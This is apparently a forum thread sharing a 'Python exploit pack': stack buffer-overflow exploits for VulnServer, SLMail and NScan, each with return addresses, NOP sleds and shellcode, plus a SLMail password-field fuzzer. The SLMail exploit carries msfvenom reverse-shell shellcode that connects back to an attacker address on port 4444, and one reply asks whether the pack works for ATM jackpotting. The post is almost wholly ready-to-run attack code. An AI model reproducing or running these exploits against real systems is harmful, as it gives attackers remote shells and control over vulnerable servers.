|
Python exploit pack VulnServer Code: <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); width: 640px; height: 498px; text-align: left; overflow: auto; background: rgb(37, 37, 37) none repeat scroll 0% 0%; border-radius: 5px; font-size: 11px; text-shadow: none;">#!/usr/bin/python import socket import struct shellcode = "" shellcode += "\xb8\xc5\x97\xc9\x70\xdb\xc1\xd9\x74\x24\xf4\ x5b" shellcode += "\x2b\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\ x06" shellcode += "\x93\x2b\x85\x74\x74\x29\x66\x84\x85\x4e\xee\ x61" shellcode += "\xb4\x4e\x94\xe2\xe7\x7e\xde\xa6\x0b\xf4\xb2\ x52" shellcode += "\x9f\x78\x1b\x55\x28\x36\x7d\x58\xa9\x6b\xbd\ xfb" shellcode += "\x29\x76\x92\xdb\x10\xb9\xe7\x1a\x54\xa4\x0a\ x4e" shellcode += "\x0d\xa2\xb9\x7e\x3a\xfe\x01\xf5\x70\xee\x01\ xea" shellcode += "\xc1\x11\x23\xbd\x5a\x48\xe3\x3c\x8e\xe0\xaa\ x26" shellcode += "\xd3\xcd\x65\xdd\x27\xb9\x77\x37\x76\x42\xdb\ x76" shellcode += "\xb6\xb1\x25\xbf\x71\x2a\x50\xc9\x81\xd7\x63\ x0e" shellcode += "\xfb\x03\xe1\x94\x5b\xc7\x51\x70\x5d\x04\x07\ xf3" shellcode += "\x51\xe1\x43\x5b\x76\xf4\x80\xd0\x82\x7d\x27\ x36" shellcode += "\x03\xc5\x0c\x92\x4f\x9d\x2d\x83\x35\x70\x51\ xd3" shellcode += "\x95\x2d\xf7\x98\x38\x39\x8a\xc3\x54\x8e\xa7\ xfb" shellcode += "\xa4\x98\xb0\x88\x96\x07\x6b\x06\x9b\xc0\xb5\ xd1" shellcode += "\xdc\xfa\x02\x4d\x23\x05\x73\x44\xe0\x51\x23\ xfe" shellcode += "\xc1\xd9\xa8\xfe\xee\x0f\x7e\xae\x40\xe0\x3f\ x1e" shellcode += "\x21\x50\xa8\x74\xae\x8f\xc8\x77\x64\xb8\x63\ x82" shellcode += "\xef\x07\xdb\x8c\xe2\xef\x1e\x8c\xe3\x7f\x97\ x6a" shellcode += "\x71\x90\xfe\x25\xee\x09\x5b\xbd\x8f\xd6\x71\ xb8" shellcode += "\x90\x5d\x76\x3d\x5e\x96\xf3\x2d\x37\x56\x4e\ x0f" shellcode += "\x9e\x69\x64\x27\x7c\xfb\xe3\xb7\x0b\xe0\xbb\ xe0" shellcode += "\x5c\xd6\xb5\x64\x71\x41\x6c\x9a\x88\x17\x57\ x1e" shellcode += "\x57\xe4\x56\x9f\x1a\x50\x7d\x8f\xe2\x59\x39\ xfb" shellcode += "\xba\x0f\x97\x55\x7d\xe6\x59\x0f\xd7\x55\x30\ xc7" shellcode += "\xae\x95\x83\x91\xae\xf3\x75\x7d\x1e\xaa\xc3\ x82" shellcode += "\xaf\x3a\xc4\xfb\xcd\xda\x2b\xd6\x55\xea\x61\ x7a" shellcode += "\xff\x63\x2c\xef\xbd\xe9\xcf\xda\x82\x17\x4c\ xee" shellcode += "\x7a\xec\x4c\x9b\x7f\xa8\xca\x70\xf2\xa1\xbe\ x76" shellcode += "\xa1\xc2\xea" payload = 'A' * 2006 + struct.pack("<L",0x625011AF) + '\x90' * 16 + shellcode try: print "\nSending Random Bytes..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.0.24',9999)) s.recv(1024) s.send(('TRUN .' + payload + '\r\n')) s.recv(1024) s.send('EXIT\r\n') s.close() print "\nExploit Done. Checking..." except: print "Could not connect to 9999 for some reason..."</pre> SLMail Code: <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); width: 640px; height: 498px; text-align: left; overflow: auto; background: rgb(37, 37, 37) none repeat scroll 0% 0%; border-radius: 5px; font-size: 11px; text-shadow: none;">#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Address=5F4A358F Message=0x5f4a358f: '\xff\xe4' | {PAGE_READONLY} [SLMFC.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v6.00.8063.0 (C:\Windows\system32\SLMFC.DLL) # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.13 LPORT=4444 -f python -e x86/shikata_ga_nai -b "\x00\x0a\x0d" # Payload size: 351 bytes shellcode = "" shellcode += "\xd9\xc9\xb8\x2d\xa8\x1e\xe6\xd9\x74\x24\xf4\ x5b" shellcode += "\x33\xc9\xb1\x52\x31\x43\x17\x03\x43\x17\x83\ xc6" shellcode += "\x54\xfc\x13\xe4\x4d\x83\xdc\x14\x8e\xe4\x55\ xf1" shellcode += "\xbf\x24\x01\x72\xef\x94\x41\xd6\x1c\x5e\x07\ xc2" shellcode += "\x97\x12\x80\xe5\x10\x98\xf6\xc8\xa1\xb1\xcb\ x4b" shellcode += "\x22\xc8\x1f\xab\x1b\x03\x52\xaa\x5c\x7e\x9f\ xfe" shellcode += "\x35\xf4\x32\xee\x32\x40\x8f\x85\x09\x44\x97\ x7a" shellcode += "\xd9\x67\xb6\x2d\x51\x3e\x18\xcc\xb6\x4a\x11\ xd6" shellcode += "\xdb\x77\xeb\x6d\x2f\x03\xea\xa7\x61\xec\x41\ x86" shellcode += "\x4d\x1f\x9b\xcf\x6a\xc0\xee\x39\x89\x7d\xe9\ xfe" shellcode += "\xf3\x59\x7c\xe4\x54\x29\x26\xc0\x65\xfe\xb1\ x83" shellcode += "\x6a\x4b\xb5\xcb\x6e\x4a\x1a\x60\x8a\xc7\x9d\ xa6" shellcode += "\x1a\x93\xb9\x62\x46\x47\xa3\x33\x22\x26\xdc\ x23" shellcode += "\x8d\x97\x78\x28\x20\xc3\xf0\x73\x2d\x20\x39\ x8b" shellcode += "\xad\x2e\x4a\xf8\x9f\xf1\xe0\x96\x93\x7a\x2f\ x61" shellcode += "\xd3\x50\x97\xfd\x2a\x5b\xe8\xd4\xe8\x0f\xb8\ x4e" shellcode += "\xd8\x2f\x53\x8e\xe5\xe5\xf4\xde\x49\x56\xb5\ x8e" shellcode += "\x29\x06\x5d\xc4\xa5\x79\x7d\xe7\x6f\x12\x14\ x12" shellcode += "\xf8\xdd\x41\x1c\xf5\xb5\x93\x1c\x14\x1a\x1d\ xfa" shellcode += "\x7c\xb2\x4b\x55\xe9\x2b\xd6\x2d\x88\xb4\xcc\ x48" shellcode += "\x8a\x3f\xe3\xad\x45\xc8\x8e\xbd\x32\x38\xc5\ x9f" shellcode += "\x95\x47\xf3\xb7\x7a\xd5\x98\x47\xf4\xc6\x36\ x10" shellcode += "\x51\x38\x4f\xf4\x4f\x63\xf9\xea\x8d\xf5\xc2\ xae" shellcode += "\x49\xc6\xcd\x2f\x1f\x72\xea\x3f\xd9\x7b\xb6\ x6b" shellcode += "\xb5\x2d\x60\xc5\x73\x84\xc2\xbf\x2d\x7b\x8d\ x57" shellcode += "\xab\xb7\x0e\x21\xb4\x9d\xf8\xcd\x05\x48\xbd\ xf2" shellcode += "\xaa\x1c\x49\x8b\xd6\xbc\xb6\x46\x53\xcc\xfc\ xca" shellcode += "\xf2\x45\x59\x9f\x46\x08\x5a\x4a\x84\x35\xd9\ x7e" shellcode += "\x75\xc2\xc1\x0b\x70\x8e\x45\xe0\x08\x9f\x23\ x06" shellcode += "\xbe\xa0\x61" payload = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode try: print "\nSending random bytes..." s.connect(('192.168.0.26', 110)) data = s.recv(1024) s.send('USER legit' + '\r\n') data = s.recv(1024) s.send('PASS ' + payload + '\r\n') data = s.recv(1024) s.close() print "\nExploit Done.. Checking..?" except: print "Could not connect to POP3 for some reason..."</pre> SLMail Fuzzer Code: <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); width: 640px; height: 354px; text-align: left; overflow: auto; background: rgb(37, 37, 37) none repeat scroll 0% 0%; border-radius: 5px; font-size: 11px; text-shadow: none;">#!/usr/bin/python import socket # To create array of buffers 1 to 5900 with space of 200. buffer=["A"] counter=100 while len(buffer) <= 30: buffer.append("A"*counter) counter=counter+200 for string in buffer: print "Fuzzing PASS with %s bytes" % len(string) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.0.19',110)) s.recv(1024) s.send('USER test\r\n') s.recv(1024) s.send('PASS ' + string + '\r\n') s.send('QUIT\r\n') s.close()</pre> NScan Code: <pre class="alt2" dir="ltr" style=" margin: 0px; padding: 6px; border: 1px solid rgb(0, 0, 0); width: 640px; height: 402px; text-align: left; overflow: auto; background: rgb(37, 37, 37) none repeat scroll 0% 0%; border-radius: 5px; font-size: 11px; text-shadow: none;">import struct junk = '\x41'*997 # 997 bytes eip = struct.pack("<L",0x7c836a78) # use little-endian to address 0x7c836a78 # call esp # kernel32.dll nops = '\x90'*10 shellcode = "\x31\xC9" # xor ecx,ecx shellcode += "\x51" # push ecx shellcode += "\x68\x63\x61\x6C\x63" # push 0x636c6163 shellcode += "\x54" # push dword ptr esp shellcode += "\xB8\xC7\x93\xC2\x77" # mov eax,0x77c293c7 shellcode += "\xFF\xD0" # call eax payload = junk + eip + nops + shellcode # combine exploit with nop sled and working shellcode try: f = open("C:\\Documents and Settings\\user\\Desktop\\log\\dig\\payload.txt","w b") f.write(payload) f.close() print "\nNScan Saved Return Pointer Overwrite Exploit" print "\nExploit written successfully!" print "Buffer size: " + str(len(payload)) + "\n" except Exception, e: print "\nError! Exploit could not be generated, error details follow:\n" print str(e) + "\n"</pre> https://txgate.io/images/smilies/punish.gif https://txgate.io/images/smilies/good.gif https://txgate.io/images/smilies/dntknw.gif |
You have Vulnserver LTER - SEH? |
hola estimado sirve para jackpot atm? |
| All times are GMT. The time now is 08:56 AM. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.